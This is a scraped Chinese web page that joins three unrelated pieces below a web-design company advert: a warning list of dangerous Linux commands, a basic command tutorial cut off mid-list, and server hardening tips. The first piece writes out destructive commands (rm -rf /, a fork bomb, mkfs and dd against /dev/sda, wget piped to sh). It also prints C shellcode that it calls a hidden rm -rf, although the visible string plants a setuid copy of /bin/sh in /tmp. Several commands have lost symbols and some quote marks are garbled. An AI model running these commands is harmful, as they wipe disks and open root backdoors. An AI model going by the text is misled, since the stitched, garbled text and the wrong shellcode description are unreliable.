Linux中最危險的10個命令

Linux中最危險的10個命令

專注于為中小企業(yè)提供成都網(wǎng)站設(shè)計、網(wǎng)站建設(shè)服務(wù),電腦端+手機端+微信端的三站合一,更高效的管理,為中小企業(yè)龍泉驛免費做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都，凝聚了一批互聯(lián)網(wǎng)行業(yè)人才，有力地推動了1000多家企業(yè)的穩(wěn)健成長，幫助中小企業(yè)通過網(wǎng)站建設(shè)實現(xiàn)規(guī)模擴充和轉(zhuǎn)變。

對于編程人員或或者Linux系統(tǒng)管理員來說，操作Linux系統(tǒng)最常見的方法就是使用命令行。當然，Linux命令行佷有用、很高效，但有時候也很危險，尤其是在你誤操作或者不確定你自己在正在做什么的時候。下面我就為大家盤點最危險是10個命令，一起來看看吧!

當然，以下命令通常都是在root權(quán)限下才能將愚蠢發(fā)揮到無可救藥;在普 通用戶身份下，破壞的只是自己的一畝三分地。

1. rm -rf 命令

rm -rf命令是刪除文件夾及其內(nèi)容最快的方式之一。僅僅一丁點的敲錯或無知都可能導致不可恢復的系統(tǒng)崩壞。下列是一些rm 命令的選項。

rm　命令在Linux下通常用來刪除文件。

rm -r 命令遞歸的刪除文件夾，甚至是空的文件夾。(譯注：個人認為此處應(yīng)該是說錯了，從常識看，應(yīng)該是“甚至是非空的文件夾”)

rm -f 命令能不經(jīng)過詢問直接刪除‘只讀文件’。(譯注：Linux下刪除文件并不在乎該文件是否是只讀的，而只是在意其父目錄是否有寫權(quán)限。所以，-f這個參數(shù) 只是表示不必一個個刪除確認，而是一律悄悄刪除。另外，原始的rm命令其實也是沒有刪除提示的，只是一般的發(fā)行版都會將rm通過別名的方式增加-i參數(shù)來 要求刪除確認，而-f則抑制了這個提示。)

rm -rf / : 強制刪除根目錄下所有東東。(就是說刪除完畢后，什么也沒有了。。。)

rm -rf *:　強制刪除當前目錄的所有文件。

rm -rf . : 強制刪除當前文件夾及其子文件夾。

從 現(xiàn)在起，當你要執(zhí)行rm -rf命令時請留心一點。我們可以在“.bashrc”文件對‘rm‘命令創(chuàng)建rm -i的別名，來預防用 ‘rm‘命令刪除文件時的事故，它會要求你確認每一個刪除請求。(譯注：大多數(shù)發(fā)行版已經(jīng)這樣做了，如果還沒有，請這樣做，并在使用-f參數(shù)前一定考慮好 你在做什么!譯者本人有著血淚的教訓啊。)

2. :(){:|:};: 命令

這就是個fork 炸彈的實例。具體操作是通過定義一個名為 ‘:‘的函數(shù)，它會調(diào)用自己兩次，一次在前臺另一次運行在后臺。它會反復的執(zhí)行下去直到系統(tǒng)崩潰。

:(){:|:};:

哦?你確認你要試試么?千萬別在公司正式的服務(wù)器上實驗啊~~

3. 命令　 /dev/sda

上列命令會將某個‘命令‘的輸出寫到塊設(shè)備/dev/sda中。該操作會將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù)，從而導致整個塊設(shè)備的數(shù)據(jù)丟失。

4. mv 文件夾 /dev/null

這 個命令會移動某個‘文件夾‘到/dev/null。在Linux中 /dev/null 或 null 設(shè)備是一個特殊的文件，所有寫入它的數(shù)據(jù)都會被清除，然后返回寫操作成功。(譯注：這就是黑洞啊。當然，要說明的是，通過將文件夾移動到黑洞，并不能阻止 數(shù)據(jù)恢復軟件的救贖，所以，真正的`徹底毀滅，需要采用專用的軟件或者手法來完成——我知道你肯定有些東西想刪除得干干凈凈的。)

# mv /home/user/* /dev/null

上列命令會將User目錄所有內(nèi)容移動到/dev/null，這意味著所有東西都被‘卷入’黑洞　(null)之中。

5. wget -O- | sh

上列命令會從一個(也許是)惡意源下載一個腳本并執(zhí)行。Wget命令會下載這個腳本，而sh會(無條件的)執(zhí)行下載下來的腳本。

注意: 你應(yīng)該時刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。(譯注：所以，你真的知道你在做什么嗎?當遇到這種需要是，我的做法是，先wget下來，然后我去讀一讀其中到底寫了些什么，然后考慮是否執(zhí)行。)

6. mkfs.ext3 /dev/sda

上列命令會格式化塊設(shè)備‘sda’，你無疑知道在執(zhí)行上列命令后你的塊設(shè)備(硬盤驅(qū) 動器)會被格式化，嶄新的!沒有任何數(shù)據(jù)，直接讓你的系統(tǒng)達到不可恢復的階段。(譯注：通常不會直接使用/dev/sda這樣的設(shè)備，除非是作為raw設(shè) 備使用，一般都需要將sda分成類似sda1、sda2這樣的分區(qū)后才使用。當然，無論你使用sda還是sda1，這樣對塊設(shè)備或分區(qū)進行mkfs都是毀 滅性的，上面的數(shù)據(jù)都會被蒸發(fā)了。)

7. file

上列命令常用來清空文件內(nèi)容(譯注：通常也用于記錄命令輸出。 不過請在執(zhí)行前，確認輸出的文件是空的或者還不存在，否則原來的文件可真是恢復不了了——連數(shù)據(jù)恢復軟件都未必能幫助你了。另外，我想你可能真正想用的是 “”，即累加新的輸出到文件，而不是刷新那個文件。)。如果用上列執(zhí)行時輸入錯誤或無知的輸入類似 “xt.conf”　的命令會覆蓋配置文件或其他任何的系統(tǒng)配置文件。

8. ^foo^bar

這個命令在“鮮為人知而又實用的 Linux 命令大全：”中描述過，用來編輯先前運行的命令而無需重打整個命令。但當用foobar命令時如果你沒有徹底檢查改變原始命令的風險，這可能導致真正的麻煩。(譯注：事實上，這種小技巧是譯者認為的，少數(shù)史前時代遺留下來的無用而有害的“黑客”技巧。)

9. dd if=/dev/random of=/dev/sda

上列命令會向塊設(shè)備sda寫入隨機的垃圾文件從而擦出數(shù)據(jù)。當然!你的系統(tǒng)可能陷入混亂和不可恢復的狀態(tài)。(譯注：記得上面說過mv到黑洞并不能徹底刪除數(shù)據(jù)么?那么這個命令就是給了你一個徹底刪除的方法!當然為了保險起見，你可以覆寫多次。)

10. 隱藏命令

下面的命令其實就是上面第一個命令 (rm -rf)。這里的代碼是隱藏在十六進制里的,一個無知的用戶可能就會被愚弄。在終端里運行下面命令可能會擦除你的根分區(qū)。

這個命令表明通常真正的危險是隱藏的，不會被輕易的檢測到。你必須時刻留心你在做什么結(jié)果會怎樣。不要編譯/運行從未知來源的代碼。

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

注意: 不要在你的或你的同學或?qū)W校的電腦里的Linux終端或Shell執(zhí)行以上的任何一個命令，因為這將導致數(shù)據(jù)丟失或者系統(tǒng)崩潰。如果你想測試它們，請在虛擬機上運行。

;

Linux常用基本命令大全介紹

學習Linux系統(tǒng)，命令是最基礎(chǔ)的一部分，有著很重要的地位，所以入門必須掌握好常用命令。下面由我為大家整理了Linux系統(tǒng)常用的基本命令入門篇，希望對大家有幫助!

Linux系統(tǒng)常用的基本命令入門篇一、基礎(chǔ)命令

1.Linu x的進 入與退出系統(tǒng)

進入Linux系統(tǒng)：

必須要輸入用戶的賬號，在系統(tǒng)安裝過程中可以創(chuàng)建以下兩種帳號：

1.root--超級用戶帳號(系統(tǒng)管理員)，使用這個帳號可以在系統(tǒng)中做任何事情。

2.普通用戶--這個帳號供普通用戶使用，可以進行有限的操作。

一般的Linux使用者均為普通用戶，而系統(tǒng)管理員一般使用超級用戶帳號完成一些系統(tǒng)管理的工作。如果只需要完成一些由普通帳號就能完成的任務(wù)，建議不要使用超級用戶帳號，以免無意中破壞系統(tǒng)。影響系統(tǒng)的正常運行。

用戶登錄分兩步：第一步，輸入用戶的登錄名，系統(tǒng)根據(jù)該登錄名識別用戶;第二步，輸入用戶的口令，該口令是用戶自己設(shè)置的一個字符串，對其他用戶是保密的，是在登錄時系統(tǒng)用來辨別真假用戶的關(guān)鍵字。

當用戶正確地輸入用戶名和口令后，就能合法地進入系統(tǒng)。屏幕顯示：

[root@loclhost/root] #

這時就可以對系統(tǒng)做各種操作了。注意超級用戶的提示符是ldquo;#rdquo;，其他用戶的提示符是ldquo;$rdquo;。

2.修改口令

為了更好的保護用戶帳號的安全，Linux允許用戶隨時修改自己的口令，修改口令的命令是passwd，它將提示用戶輸入舊口令和新口令，之后還要求用戶再次確認新口令，以避免用戶無意中按錯鍵。如果用戶忘記了口令，可以向系統(tǒng)管理員申請為自己重新設(shè)置一個。

3.虛擬控制臺

Linux是一個真正的多用戶 操作系統(tǒng) ，它可以同時接受多個用戶登錄。Linux還允許一個用戶進行多次登錄，這是因為Linux和UNIX一樣，提供了虛擬控制臺的訪問方式，允許用戶在同一時間從控制臺進行多次登錄。虛擬控制臺的選擇可以通過按下Alt鍵和一個功能鍵來實現(xiàn)，通常使用F1-F6例如，用戶登錄后，按一下Alt-F2鍵，用戶又可以看到"login:"提示符，說明用戶看到了第二個虛擬控制臺。然后只需按Alt-F1鍵，就可以回到第一個虛擬控制臺。 一個新安裝的Linux系統(tǒng)默認允許用戶使用Alt-F1到Alt-F6鍵來訪問前六個虛擬控制臺。虛擬控制臺可使用戶同時在多個控制臺上工作，真正體現(xiàn)Linux系統(tǒng)多用戶的特性。用戶可以在某一虛擬控制臺上進行的工作尚未結(jié)束時，切換到另一虛擬控制臺開始另一項工作。

退出系統(tǒng)

不論是超級用戶，還是普通用戶，需要退出系統(tǒng)時，在shell提示符下，鍵入exit命令即可。

4.查看命令幫助信息

man命令

man命令用于查詢命令和程序的使用 方法 和參數(shù)。

例如：

man ls

將顯示ls命令的基本格式和使用方法

Linux系統(tǒng)常用的基本命令入門篇二、關(guān)機重啟命令

首先，是關(guān)機/重啟命令，僅在虛擬機時使用，實際工作中用不到

reboot 一般不跟參數(shù)使用，輸入指令即可重啟

shutdown 一般需要跟參數(shù)，例：

shutdown -r 延時多少分鐘重啟，一般使用now

shutdown -r now 立即重啟

shutdown -f 強制重啟

跟windows一樣，linux也存在注銷功能

exit

1)halt

halt 可不接參數(shù)

halt -f 強制關(guān)機

2)poweroff

poweroff 可不接參數(shù)使用

poweroff -f 強制關(guān)機

3)init 0

4)shutdown 不可單獨使用

shutdown -h 分鐘數(shù) 延時多久關(guān)機

shutdown -h now 立即關(guān)機

Linux系統(tǒng)常用的基本命令入門篇三、vi編輯

vi命令是UNIX操作系統(tǒng)和類UNIX操作系統(tǒng)中最通用的全屏幕純文本編輯器。

Linux中的vi編輯器叫vim，它是vi的增強版(vi Improved)，與vi編輯器完全兼容，而且實現(xiàn)了很多增強功能。

vi編輯器支持編輯模式和命令模式，編輯模式下可以完成文本的編輯功能，命令模式下可以完成對文件的操作命令，要正確使用vi編輯器就必須熟練掌握著兩種模式的切換。

默認情況下，打開vi編輯器后自動進入命令模式。從編輯模式切換到命令模式使用ldquo;escrdquo;鍵，從命令模式切換到編輯模式使用ldquo;Ardquo;、ldquo;ardquo;、ldquo;Ordquo;、ldquo;ordquo;、ldquo;Irdquo;、ldquo;irdquo;鍵。

vi編輯器提供了豐富的內(nèi)置命令，有些內(nèi)置命令使用鍵盤組合鍵即可完成，有些內(nèi)置命令則需要以冒號ldquo;：rdquo;開頭輸入。常用內(nèi)置命令如下：

1 Ctrl+u：向文件首翻半屏;

2 Ctrl+d：向文件尾翻半屏;

3 Ctrl+f：向文件尾翻一屏;

4 Ctrl+b：向文件首翻一屏;

5 Esc：從編輯模式切換到命令模式;

6 ZZ：命令模式下保存當前文件所做的修改后退出vi;

7 :行號：光標跳轉(zhuǎn)到指定行的行首;

8 :$：光標跳轉(zhuǎn)到最后一行的行首;

9 x或X：刪除一個字符，x刪除光標后的，而X刪除光標前的;

10 D：刪除從當前光標到光標所在行尾的全部字符;

11 dd：刪除光標行正行內(nèi)容;

12 ndd：刪除當前行及其后n-1行;

13 nyy：將當前行及其下n行的內(nèi)容保存到寄存器?中，其中?為一個字母，n為一個數(shù)字;

14 p：粘貼文本操作，用于將緩存區(qū)的內(nèi)容粘貼到當前光標所在位置的下方;

15 P：粘貼文本操作，用于將緩存區(qū)的內(nèi)容粘貼到當前光標所在位置的上方;

16 /字符串：文本查找操作，用于從當前光標所在位置開始向文件尾部查找指定字符串的內(nèi)容，查找的字符串會被加亮顯示;

17 ?name：文本查找操作，用于從當前光標所在位置開始向文件頭部查找指定字符串的內(nèi)容，查找的字符串會被加亮顯示;

18 a，bs/F/T：替換文本操作，用于在第a行到第b行之間，將F字符串換成T字符串。其中，ldquo;s/rdquo;表示進行替換操作;

19 a：在當前字符后添加文本;

20 A：在行末添加文本;

21 i：在當前字符前插入文本;

22 I：在行首插入文本;

23 o：在當前行后面插入一空行;

24 O：在當前行前面插入一空行;

25 :wq：在命令模式下，執(zhí)行存盤退出操作;

26 :w：在命令模式下，執(zhí)行存盤操作;

27 :w!：在命令模式下，執(zhí)行強制存盤操作;

28 :q：在命令模式下，執(zhí)行退出vi操作;

29 :q!：在命令模式下，執(zhí)行強制退出vi操作;

30 :e文件名：在命令模式下，打開并編輯指定名稱的文件;

31 :n：在命令模式下，如果同時打開多個文件，則繼續(xù)編輯下一個文件;

32 :f：在命令模式下，用于顯示當前的文件名、光標所在行的行號以及顯示比例;

33 :set nu：在命令模式下，用于在最左端顯示行號;

34 :set nonu：在命令模式下，用于在最左端不顯示行號;

35 :1,3y 復制第一行到第三行

36 :1,3d 刪除第一行到第三行

37 :1,3s/str/str_new/g 替換第一行到第三行中的字符串

38 :1,3s/str/str_new 替換第一行到第三行中的字符串第一個字符

39 :1,3 g/str /d 刪除第一行到第三行中含有這個字符串的行

Linux常用命令一、查詢相關(guān)

find

按規(guī)則查找某個文件或文件夾，包括子目錄

find . -name '_sh' -- 以.sh結(jié)尾的文件

find . -name '_hannel_ -- 包含channel字符的文件

find . -name 'build_ -- 以build開頭的文件

find . -name 'abc??' -- abc后面有兩個字符的文件

grep

查找內(nèi)容包含指定的范本樣式的文件，Global Regular Expression Print

grep -n pattern files -- 規(guī)則 -n表示顯示行號

grep -n 'PostsActivity' AndroidManifest.xmlgrep -n '\d' AndroidManifest.xmlgrep 'aapt' build-channel.xml -- 文件中包含字符串的所有地方

grep -n 'aapt' build-channel.xml -- 文件中包含字符串的所有地方，并顯示行號

ps -e | grep java -- 所有java進程

ps -e | grep -i qq --所有qq進程，不區(qū)分大小寫

find . -name '_hannel.xml' | xargs grep -n 'aapt' -- 在以channel.xml結(jié)尾的文件中查找包含lsquo;aaptrsquo;關(guān)鍵字的地方

ls | grep 'channel' -- 包含channel關(guān)鍵字的文件

which

在PATH變量指定的路徑中，搜索某個系統(tǒng)命令的位置，并且返回第一個搜索結(jié)果

which zipwhich grep

Linux常用命令二、查看命令

tail

tail [-f] [-c Number | -n Number | -m Number | -b Number | -k Number] [File]

從指定點開始將文件寫到標準輸出。使用tail命令的-f選項可以方便的查閱正在改變的日志文件，tail -f filename會把filename里最尾部的內(nèi)容顯示在屏幕上，并且不斷刷新，使你看到最新的文件內(nèi)容。

tail -f test.log，循環(huán)查看文件內(nèi)容，Ctrl+c來終止

tail -n 5 test.log，顯示文件最后5行內(nèi)容

tail -n +5 test.log，從第5行開始顯示文件

more

more [-dlfpcsu] [-num] [+/ pattern] [+linenum] [file...]

more命令和cat的功能一樣都是查看文件里的內(nèi)容，但有所不同的是more可以按頁來查看文件的內(nèi)容，還支持直接跳轉(zhuǎn)行等功能。

more +3 test.log，顯示文件中從第3行起的內(nèi)容

more -5 test.log，設(shè)定每屏顯示行數(shù)

ls -l | more -5，每頁顯示5個文件信息

more +/day3 test.log，查找第一個出現(xiàn)"day3"字符串的行，并從該處前兩行開始顯示輸出

less

less [options] [file...]

與more命令一樣，less命令也用來分屏顯示文件的內(nèi)容。但是二者存在差別：less命令允許用戶向前或向后瀏覽文件，而more命令只能向前瀏覽。用less命令顯示文件時，用PageUp鍵向上翻頁，用PageDown鍵向下翻頁。要退出less程序，應(yīng)按Q鍵。

less test.log，查看文件

ps -ef | less，查看進程信息并通過less分頁顯示

history | less，查看命令歷史使用記錄并通過less分頁顯示

less test1.log test2.log，瀏覽多個文件，n和p切換文件

watch

watch [options] command

每隔一段時間重復運行一個命令，默認間隔時間是2秒。要運行的命令直接傳給shell(注意引用和轉(zhuǎn)義特殊字符)。結(jié)果會展示為全屏模式，這樣你可以很方便的觀察改變

watch -n 60 date，執(zhí)行date命令每分鐘一次，輸入^C 退出

watch -d ls -l，查看目錄變化

watch -d rsquo;ls -l | fgrep joersquo;，想找joe用戶的文件

watch -d 'ls -l|grep scf'，監(jiān)測當前目錄中 scf' 的文件的變化

watch -n 10 'cat /proc/loadavg'，10秒一次輸出系統(tǒng)的平均負載

watch -n 1 -d netstat -ant，每隔一秒高亮顯示網(wǎng)絡(luò)鏈接數(shù)的變化

watch -n 1 -d 'pstree | grep http'，每隔一秒高亮顯示http鏈接數(shù)的變化

Linux常用命令三、文件相關(guān)

vi

vi file

按i鍵，進入編輯模式

按esc鍵，進入命令模式

:w 保存文件但不退出vi

:w file 將修改另外保存到file中，不退出vi

:w! 強制保存，不推出vi

:wq 保存文件并退出vi

:wq! 強制保存文件，并退出vi

q: 不保存文件，退出vi

:q! 不保存文件，強制退出vi

:e! 放棄所有修改，從上次保存文件開始再編輯

chmod

change mode，變更文件或目錄的讀、寫、運行權(quán)限

chmod [-cfvR] [--help] [--version] mode file...

mode:權(quán)限設(shè)定字串，格式如下 : [ugoa...][[+-=][rw xX ]...][,...]

u 表示該檔案的擁有者，g 表示與該檔案的擁有者屬于同一個群體(group)者，o 表示其他以外的人，a 表示這三者皆是

+ 表示增加權(quán)限、- 表示取消權(quán)限、= 表示唯一設(shè)定權(quán)限。

r 表示可讀取，w 表示可寫入，x 表示可執(zhí)行，X 表示只有當該檔案是個子目錄或者該檔案已經(jīng)被設(shè)定過為可執(zhí)行。

chmod也可以用數(shù)字來表示權(quán)限，語法為：chmod abc file，如chmod 777 file

其中a,b,c各為一個數(shù)字，分別表示User、Group、及Other的權(quán)限。 r=4，w=2，x=1

chmod 777 file，等同于 chmod a=rwx file

chmod ug=rwx,o=x file，等同于 chmod 771 file

chmod 4755 filename，可使此程序具有root的權(quán)限

ls -l 可以查看列出當前用戶的文件權(quán)限

zip

zip -r filename.zip filesdir

zip -r test.zip ./_把當前所有文件壓縮到test.zip

zip -r test.zip test，把test文件所有文件及目錄，要是到test.zip

zip -d test.zip test.txt，刪除壓縮文件中test.txt文件

zip -m test.zip ./test.txt，向壓縮文件中test.zip中添加test.txt文件

zip -r test.zip file1 file2 file3 filesdir，處理多個文件和目錄，空格隔開

unzip

unzip zip-file，解壓到當前目錄

unzip -d dst-dir zip-file，解壓到指定的目錄，-d后為指定目錄

unzip -n zip-file，不覆蓋已經(jīng)存在的文件，-n為不要覆蓋原有的文件

unzip -n -d dst-dir zip-file，解壓到指定的目錄，不覆蓋已經(jīng)原有的文件

unzip -o -d dst-dir zip-file，-o不必先詢問用戶覆蓋原有文件

unzip -l zip-file，僅查看壓縮文件內(nèi)所包含的文件

tar

tar cvf test.tar test，把test下所有文件和目錄做備份tar czvf test.tar.gz test，把test下所有文件和目錄做備份并進行壓縮tar xzvf test.tar.gz，把這個備份文件還原并解壓縮tar tvf test.tar | more，查看備份文件的內(nèi)容，并以分屏方式顯示在 顯示器 上

tar czvf test.tar.gz test --exclude=test/svn，備份壓縮并排除目錄

touch

Linux服務(wù)器的安全防護都有哪些措施？

隨著開源系統(tǒng)Linux的盛行，其在大中型企業(yè)的應(yīng)用也在逐漸普及，很多企業(yè)的應(yīng)用服務(wù)都是構(gòu)筑在其之上，例如Web服務(wù)、數(shù)據(jù)庫服務(wù)、集群服務(wù)等等。因此，Linux的安全性就成為了企業(yè)構(gòu)筑安全應(yīng)用的一個基礎(chǔ)，是重中之重，如何對其進行安全防護是企業(yè)需要解決的一個基礎(chǔ)性問題，基于此，本文將給出十大企業(yè)級Linux服務(wù)器安全防護的要點。 1、強化：密碼管理 設(shè)定登錄密碼是一項非常重要的安全措施，如果用戶的密碼設(shè)定不合適，就很容易被破譯，尤其是擁有超級用戶使用權(quán)限的用戶，如果沒有良好的密碼，將給系統(tǒng)造成很大的安全漏洞。 目前密碼破解程序大多采用字典攻擊以及暴力攻擊手段，而其中用戶密碼設(shè)定不當，則極易受到字典攻擊的威脅。很多用戶喜歡用自己的英文名、生日或者賬戶等信息來設(shè)定密碼，這樣，黑客可能通過字典攻擊或者是社會工程的手段來破解密碼。所以建議用戶在設(shè)定密碼的過程中，應(yīng)盡量使用非字典中出現(xiàn)的組合字符，并且采用數(shù)字與字符相結(jié)合、大小寫相結(jié)合的密碼設(shè)置方式，增加密碼被黑客破解的難度。而且，也可以使用定期修改密碼、使密碼定期作廢的方式，來保護自己的登錄密碼。 在多用戶系統(tǒng)中，如果強迫每個用戶選擇不易猜出的密碼，將大大提高系統(tǒng)的安全性。但如果passwd程序無法強迫每個上機用戶使用恰當?shù)拿艽a，要確保密碼的安全度，就只能依靠密碼破解程序了。實際上，密碼破解程序是黑客工具箱中的一種工具，它將常用的密碼或者是英文字典中所有可能用來作密碼的字都用程序加密成密碼字，然后將其與Linux系統(tǒng)的/etc/passwd密碼文件或/etc/shadow影子文件相比較，如果發(fā)現(xiàn)有吻合的密碼，就可以求得明碼了。在網(wǎng)絡(luò)上可以找到很多密碼破解程序，比較有名的程序是crack和john the ripper.用戶可以自己先執(zhí)行密碼破解程序，找出容易被黑客破解的密碼，先行改正總比被黑客破解要有利。 2、限定：網(wǎng)絡(luò)服務(wù)管理 早期的Linux版本中，每一個不同的網(wǎng)絡(luò)服務(wù)都有一個服務(wù)程序(守護進程，Daemon)在后臺運行，后來的版本用統(tǒng)一的/etc/inetd服務(wù)器程序擔此重任。Inetd是Internetdaemon的縮寫，它同時監(jiān)視多個網(wǎng)絡(luò)端口，一旦接收到外界傳來的連接信息，就執(zhí)行相應(yīng)的TCP或UDP網(wǎng)絡(luò)服務(wù)。由于受inetd的統(tǒng)一指揮，因此Linux中的大部分TCP或UDP服務(wù)都是在/etc/inetd.conf文件中設(shè)定。所以取消不必要服務(wù)的第一步就是檢查/etc/inetd.conf文件，在不要的服務(wù)前加上“#”號。 一般來說，除了http、smtp、telnet和ftp之外，其他服務(wù)都應(yīng)該取消，諸如簡單文件傳輸協(xié)議tftp、網(wǎng)絡(luò)郵件存儲及接收所用的imap/ipop傳輸協(xié)議、尋找和搜索資料用的gopher以及用于時間同步的daytime和time等。還有一些報告系統(tǒng)狀態(tài)的服務(wù)，如finger、efinger、systat和netstat等，雖然對系統(tǒng)查錯和尋找用戶非常有用，但也給黑客提供了方便之門。例如，黑客可以利用finger服務(wù)查找用戶的電話、使用目錄以及其他重要信息。因此，很多Linux系統(tǒng)將這些服務(wù)全部取消或部分取消，以增強系統(tǒng)的安全性。Inetd除了利用/etc/inetd.conf設(shè)置系統(tǒng)服務(wù)項之外，還利用/etc/services文件查找各項服務(wù)所使用的端口。因此，用戶必須仔細檢查該文件中各端口的設(shè)定，以免有安全上的漏洞。 在后繼的Linux版本中(比如Red Hat Linux7.2之后)，取而代之的是采用xinetd進行網(wǎng)絡(luò)服務(wù)的管理。 當然，具體取消哪些服務(wù)不能一概而論，需要根據(jù)實際的應(yīng)用情況來定，但是系統(tǒng)管理員需要做到心中有數(shù)，因為一旦系統(tǒng)出現(xiàn)安全問題，才能做到有步驟、有條不紊地進行查漏和補救工作，這點比較重要。 3、嚴格審計：系統(tǒng)登錄用戶管理 在進入Linux系統(tǒng)之前，所有用戶都需要登錄，也就是說，用戶需要輸入用戶賬號和密碼，只有它們通過系統(tǒng)驗證之后，用戶才能進入系統(tǒng)。 與其他Unix操作系統(tǒng)一樣，Linux一般將密碼加密之后，存放在/etc/passwd文件中。Linux系統(tǒng)上的所有用戶都可以讀到/etc/passwd文件，雖然文件中保存的密碼已經(jīng)經(jīng)過加密，但仍然不太安全。因為一般的用戶可以利用現(xiàn)成的密碼破譯工具，以窮舉法猜測出密碼。比較安全的方法是設(shè)定影子文件/etc/shadow，只允許有特殊權(quán)限的用戶閱讀該文件。 在Linux系統(tǒng)中，如果要采用影子文件，必須將所有的公用程序重新編譯，才能支持影子文件。這種方法比較麻煩，比較簡便的方法是采用插入式驗證模塊(PAM)。很多Linux系統(tǒng)都帶有Linux的工具程序PAM，它是一種身份驗證機制，可以用來動態(tài)地改變身份驗證的方法和要求，而不要求重新編譯其他公用程序。這是因為PAM采用封閉包的方式，將所有與身份驗證有關(guān)的邏輯全部隱藏在模塊內(nèi)，因此它是采用影子檔案的最佳幫手。 此外，PAM還有很多安全功能：它可以將傳統(tǒng)的DES加密方法改寫為其他功能更強的加密方法，以確保用戶密碼不會輕易地遭人破譯;它可以設(shè)定每個用戶使用電腦資源的上限;它甚至可以設(shè)定用戶的上機時間和地點。 Linux系統(tǒng)管理人員只需花費幾小時去安裝和設(shè)定PAM，就能大大提高Linux系統(tǒng)的安全性，把很多攻擊阻擋在系統(tǒng)之外。 4、設(shè)定：用戶賬號安全等級管理 除密碼之外，用戶賬號也有安全等級，這是因為在Linux上每個賬號可以被賦予不同的權(quán)限，因此在建立一個新用戶ID時，系統(tǒng)管理員應(yīng)該根據(jù)需要賦予該賬號不同的權(quán)限，并且歸并到不同的用戶組中。 在Linux系統(tǒng)中的部分文件中，可以設(shè)定允許上機和不允許上機人員的名單。其中，允許上機人員名單在/etc/hosts.allow中設(shè)置，不允許上機人員名單在/etc/hosts.deny中設(shè)置。此外，Linux將自動把允許進入或不允許進入的結(jié)果記錄到/var/log/secure文件中，系統(tǒng)管理員可以據(jù)此查出可疑的進入記錄。 每個賬號ID應(yīng)該有專人負責。在企業(yè)中，如果負責某個ID的職員離職，管理員應(yīng)立即從系統(tǒng)中刪除該賬號。很多入侵事件都是借用了那些很久不用的賬號。 在用戶賬號之中，黑客最喜歡具有root權(quán)限的賬號，這種超級用戶有權(quán)修改或刪除各種系統(tǒng)設(shè)置，可以在系統(tǒng)中暢行無阻。因此，在給任何賬號賦予root權(quán)限之前，都必須仔細考慮。 Linux系統(tǒng)中的/etc/securetty文件包含了一組能夠以root賬號登錄的終端機名稱。例如，在RedHatLinux系統(tǒng)中，該文件的初始值僅允許本地虛擬控制臺(rtys)以root權(quán)限登錄，而不允許遠程用戶以root權(quán)限登錄。最好不要修改該文件，如果一定要從遠程登錄為root權(quán)限，最好是先以普通賬號登錄，然后利用su命令升級為超級用戶。 5、謹慎使用：“r系列”遠程程序管理 在Linux系統(tǒng)中有一系列r字頭的公用程序，比如rlogin，rcp等等。它們非常容易被黑客用來入侵我們的系統(tǒng)，因而非常危險，因此絕對不要將root賬號開放給這些公用程序。由于這些公用程序都是用。rhosts文件或者hosts.equiv文件核準進入的，因此一定要確保root賬號不包括在這些文件之內(nèi)。 由于r等遠程指令是黑客們用來攻擊系統(tǒng)的較好途徑，因此很多安全工具都是針對這一安全漏洞而設(shè)計的。例如，PAM工具就可以用來將r字頭公用程序有效地禁止掉，它在/etc/pam.d/rlogin文件中加上登錄必須先核準的指令，使整個系統(tǒng)的用戶都不能使用自己home目錄下的。rhosts文件。 6、限制：root用戶權(quán)限管理 Root一直是Linux保護的重點，由于它權(quán)力無限，因此最好不要輕易將超級用戶授權(quán)出去。但是，有些程序的安裝和維護工作必須要求有超級用戶的權(quán)限，在這種情況下，可以利用其他工具讓這類用戶有部分超級用戶的權(quán)限。sudo就是這樣的工具。 sudo程序允許一般用戶經(jīng)過組態(tài)設(shè)定后，以用戶自己的密碼再登錄一次，取得超級用戶的權(quán)限，但只能執(zhí)行有限的幾個指令。例如，應(yīng)用sudo后，可以讓管理磁帶備份的管理人員每天按時登錄到系統(tǒng)中，取得超級用戶權(quán)限去執(zhí)行文檔備份工作，但卻沒有特權(quán)去作其他只有超級用戶才能作的工作。 sudo不但限制了用戶的權(quán)限，而且還將每次使用sudo所執(zhí)行的指令記錄下來，不管該指令的執(zhí)行是成功還是失敗。在大型企業(yè)中，有時候有許多人同時管理Linux系統(tǒng)的各個不同部分，每個管理人員都有用sudo授權(quán)給某些用戶超級用戶權(quán)限的能力，從sudo的日志中，可以追蹤到誰做了什么以及改動了系統(tǒng)的哪些部分。 值得注意的是，sudo并不能限制所有的用戶行為，尤其是當某些簡單的指令沒有設(shè)置限定時，就有可能被黑客濫用。例如，一般用來顯示文件內(nèi)容的/etc/cat指令，如果有了超級用戶的權(quán)限，黑客就可以用它修改或刪除一些重要的文件。 7、追蹤黑客蹤跡：日志管理 當用戶仔細設(shè)定了各種與Linux相關(guān)的配置(最常用日志管理選項)，并且安裝了必要的安全防護工具之后，Linux操作系統(tǒng)的安全性的確大為提高，但是卻并不能保證防止那些比較熟練的網(wǎng)絡(luò)黑客的入侵。 在平時，網(wǎng)絡(luò)管理人員要經(jīng)常提高警惕，隨時注意各種可疑狀況，并且按時檢查各種系統(tǒng)日志文件，包括一般信息日志、網(wǎng)絡(luò)連接日志、文件傳輸日志以及用戶登錄日志等。在檢查這些日志時，要注意是否有不合常理的時間記載。例如： 正常用戶在半夜三更登錄; 不正常的日志記錄，比如日志只記錄了一半就切斷了，或者整個日志文件被刪除了; 用戶從陌生的網(wǎng)址進入系統(tǒng); 因密碼錯誤或用戶賬號錯誤被擯棄在外的日志記錄，尤其是那些一再連續(xù)嘗試進入失敗，但卻有一定模式的試錯法; 非法使用或不正當使用超級用戶權(quán)限su的指令; 重新開機或重新啟動各項服務(wù)的記錄。 